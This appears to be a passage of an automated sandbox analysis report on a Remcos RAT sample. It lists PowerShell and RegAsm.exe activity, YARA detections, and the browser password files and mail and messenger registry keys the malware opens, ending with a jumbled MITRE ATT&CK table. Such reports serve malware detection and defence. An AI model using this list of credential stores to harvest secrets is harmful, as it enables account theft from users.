                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404F51 GetLocalTime,CreateEventA,CreateThread,11_2_00404F51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B69E GetComputerNameExW,GetUserNameW,11_2_0041B69E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00449210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041739B GetVersionExW,12_2_0041739B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040BA4D
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db11_2_0040BB6B
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword14_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword14_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword14_2_00402DB3
                      Yara detected WebBrowserPassView password recovery tool
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe11_2_0040569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts11
                      Native API                      		111
                      Scripting                      		1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		1
                      Bypass User Account Control                      		2
                      Obfuscated Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts122
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Access Token Manipulation                      		1
                      Software Packing                      		2
                      Credentials in Registry                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares11
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		Login Hook1
                      Windows Service                      		1
                      DLL Side-Loading                      		3
                      Credentials In Files                      		3
                      File and Directory Discovery                      		Distributed Component Object Model211
                      Input Capture                      		1
                      Remote Access Software                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts4
                      PowerShell                      		Network Logon Script422
                      Process Injection                      		1
                      Bypass User Account Control                      		LSA Secrets39
                      System Information Discovery                      		SSH3
                      Clipboard Data                      		2
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials31
                      Security Software Discovery                      		VNCGUI Input Capture213
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Virtualization/Sandbox Evasion                      		DCSync21
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
